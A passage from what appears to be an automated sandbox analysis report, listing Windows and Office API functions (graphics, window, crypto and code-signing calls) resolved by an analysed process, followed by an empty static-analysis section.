  2403.     "gdi32.dll.CreateCompatibleBitmap",
  2404.     "gdi32.dll.SaveDC",
  2405.     "gdi32.dll.SetPixel",
  2406.     "gdi32.dll.GetPixel",
  2407.     "gdi32.dll.RestoreDC",
  2408.     "imm32.dll.ImmAssociateContext",
  2409.     "mso.dll.#806",
  2410.     "mso.dll.#4908",
  2411.     "mso.dll.#8439",
  2412.     "mso.dll.#2736",
  2413.     "gdi32.dll.GetTextAlign",
  2414.     "gdi32.dll.ExtTextOutW",
  2415.     "mso.dll.#8122",
  2416.     "mso.dll.#2114",
  2417.     "mso.dll.#6558",
  2418.     "gdi32.dll.GetFontData",
  2419.     "usp10.dll.ScriptItemizeOpenType",
  2420.     "usp10.dll.ScriptLayout",
  2421.     "usp10.dll.ScriptShapeOpenType",
  2422.     "usp10.dll.ScriptPlaceOpenType",
  2423.     "mso.dll.#1318",
  2424.     "gdi32.dll.GetTextExtentExPointWPri",
  2425.     "webservices.dll.WsResetHeap",
  2426.     "webservices.dll.WsCloseServiceProxy",
  2427.     "ws2_32.dll.#3",
  2428.     "webservices.dll.WsFreeServiceProxy",
  2429.     "ncrypt.dll.SslDecrementProviderReferenceCount",
  2430.     "ncrypt.dll.SslFreeObject",
  2431.     "mso.dll.#8395",
  2432.     "mso.dll.#379",
  2433.     "mso.dll.#6338",
  2434.     "mso.dll.#7964",
  2435.     "mso.dll.#1437",
  2436.     "mso.dll.#1427",
  2437.     "mso.dll.#6137",
  2438.     "winmm.dll.timeGetTime",
  2439.     "mso.dll.#7578",
  2440.     "mso.dll.#8483",
  2441.     "mso.dll.#3055",
  2442.     "user32.dll.GetForegroundWindow",
  2443.     "user32.dll.GetFocus",
  2444.     "user32.dll.GetClassNameA",
  2445.     "user32.dll.IsWindowRedirectedForPrint",
  2446.     "gdi32.dll.CreateRectRgnIndirect",
  2447.     "user32.dll.GetUpdateRgn",
  2448.     "gdi32.dll.GetRgnBox",
  2449.     "user32.dll.ValidateRect",
  2450.     "user32.dll.GetUpdateRect",
  2451.     "user32.dll.BeginPaint",
  2452.     "user32.dll.EndPaint",
  2453.     "mso.dll.#3624",
  2454.     "msptls.dll.?LsPointXYFromPointUV@Ptls6@@YGJPBUtagLSPOINT@1@KPBUtagLSPOINTUV@1@PAU21@@Z",
  2455.     "msptls.dll.?LsDisplayLine@Ptls6@@YGJPAVCLsLine@1@PBUtagLSPOINT@1@IPBUtagLSRECT@1@@Z",
  2456.     "gdi32.dll.TranslateCharsetInfo",
  2457.     "mso.dll.#3300",
  2458.     "mso.dll.#7465",
  2459.     "mso.dll.#6247",
  2460.     "mso.dll.#5070",
  2461.     "gdiplus.dll.GdipCreateSolidFill",
  2462.     "gdiplus.dll.GdipCreatePen1",
  2463.     "gdiplus.dll.GdipSetPenLineCap197819",
  2464.     "gdiplus.dll.GdipSetPenLineJoin",
  2465.     "gdiplus.dll.GdipSetPenMiterLimit",
  2466.     "gdiplus.dll.GdipCreateFromHDC",
  2467.     "gdiplus.dll.GdipSetPixelOffsetMode",
  2468.     "gdiplus.dll.GdipSetSmoothingMode",
  2469.     "gdiplus.dll.GdipSetCompositingQuality",
  2470.     "gdiplus.dll.GdipSetPageUnit",
  2471.     "gdiplus.dll.GdipSetInterpolationMode",
  2472.     "gdiplus.dll.GdipGetSmoothingMode",
  2473.     "gdiplus.dll.GdipFillPath",
  2474.     "gdiplus.dll.GdipDeleteGraphics",
  2475.     "gdiplus.dll.GdipDrawPath",
  2476.     "mso.dll.#6899",
  2477.     "gdi32.dll.GetClipRgn",
  2478.     "gdi32.dll.SelectClipRgn",
  2479.     "gdi32.dll.SetWindowOrgEx",
  2480.     "mso.dll.#732",
  2481.     "mso.dll.#5804",
  2482.     "mso.dll.#9465",
  2483.     "ole32.dll.CoCreateInstance",
  2484.     "user32.dll.ScreenToClient",
  2485.     "mso.dll.#434",
  2486.     "user32.dll.GetMessageExtraInfo",
  2487.     "user32.dll.GetCursorInfo",
  2488.     "user32.dll.GetCapture",
  2489.     "user32.dll.TrackMouseEvent",
  2490.     "user32.dll.GetInputState",
  2491.     "mso.dll.#8461",
  2492.     "user32.dll.GetClipboardOwner",
  2493.     "mso.dll.#1422",
  2494.     "user32.dll.MsgWaitForMultipleObjectsEx",
  2495.     "advapi32.dll.NotifyServiceStatusChangeW",
  2496.     "user32.dll.GetWindowDC",
  2497.     "gdi32.dll.SetLayout",
  2498.     "gdi32.dll.RectVisible",
  2499.     "gdi32.dll.ExcludeClipRect",
  2500.     "user32.dll.GetDesktopWindow",
  2501.     "user32.dll.WindowFromPoint",
  2502.     "user32.dll.FindWindowExW",
  2503.     "user32.dll.IsClipboardFormatAvailable",
  2504.     "user32.dll.GetMessagePos",
  2505.     "user32.dll.SetFocus",
  2506.     "mso.dll.#4746",
  2507.     "mso.dll.#424",
  2508.     "msptls.dll.?LsPointUV2FromPointUV1@Ptls6@@YGJKPBUtagLSPOINTUV@1@0KPAU21@@Z",
  2509.     "msptls.dll.?LsQueryLinePointPcp@Ptls6@@YGJPAVCLsLine@1@PBUtagLSPOINTUV@1@JPAUlsqsubinfo@1@PAJPAUlstextcell@1@@Z",
  2510.     "user32.dll.IsWindow",
  2511.     "user32.dll.GetActiveWindow",
  2512.     "user32.dll.GetAncestor",
  2513.     "mso.dll.#3544",
  2514.     "mso.dll.#900",
  2515.     "advapi32.dll.ConvertSidToStringSidW",
  2516.     "msi.dll.DllGetVersion",
  2517.     "msi.dll.#111",
  2518.     "user32.dll.GetScrollPos",
  2519.     "mso.dll.#629",
  2520.     "advapi32.dll.CryptAcquireContextA",
  2521.     "advapi32.dll.CryptGenKey",
  2522.     "cryptsp.dll.CryptGenKey",
  2523.     "advapi32.dll.CryptImportKey",
  2524.     "cryptsp.dll.CryptImportKey",
  2525.     "advapi32.dll.CryptExportKey",
  2526.     "cryptsp.dll.CryptExportKey",
  2527.     "advapi32.dll.CryptDestroyKey",
  2528.     "advapi32.dll.CryptCreateHash",
  2529.     "advapi32.dll.CryptSetHashParam",
  2530.     "advapi32.dll.CryptHashData",
  2531.     "advapi32.dll.CryptGetHashParam",
  2532.     "cryptsp.dll.CryptGetHashParam",
  2533.     "advapi32.dll.CryptDestroyHash",
  2534.     "kernel32.dll.FlsAlloc",
  2535.     "kernel32.dll.FlsGetValue",
  2536.     "kernel32.dll.FlsSetValue",
  2537.     "kernel32.dll.FlsFree",
  2538.     "ieawsdc.dll.HrExtractTemplateToPath",
  2539.     "msi.dll.#90",
  2540.     "crypt32.dll.CryptQueryObject",
  2541.     "wintrust.dll.CryptSIPPutSignedDataMsg",
  2542.     "wintrust.dll.CryptSIPGetSignedDataMsg",
  2543.     "cryptsp.dll.CryptGetDefaultProviderW",
  2544.     "cryptsp.dll.CryptAcquireContextW",
  2545.     "crypt32.dll.CertEnumCertificatesInStore",
  2546.     "crypt32.dll.CryptVerifyCertificateSignatureEx",
  2547.     "cryptsp.dll.CryptReleaseContext",
  2548.     "wintrust.dll.WinVerifyTrust",
  2549.     "wintrust.dll.WintrustCertificateTrust",
  2550.     "wintrust.dll.SoftpubAuthenticode",
  2551.     "wintrust.dll.SoftpubInitialize",
  2552.     "wintrust.dll.SoftpubLoadMessage",
  2553.     "wintrust.dll.SoftpubLoadSignature",
  2554.     "wintrust.dll.SoftpubCheckCert",
  2555.     "wintrust.dll.SoftpubCleanup",
  2556.     "wintrust.dll.CryptSIPVerifyIndirectData"
  2557. ]
  2558.  
  2559. [*] Static Analysis: {}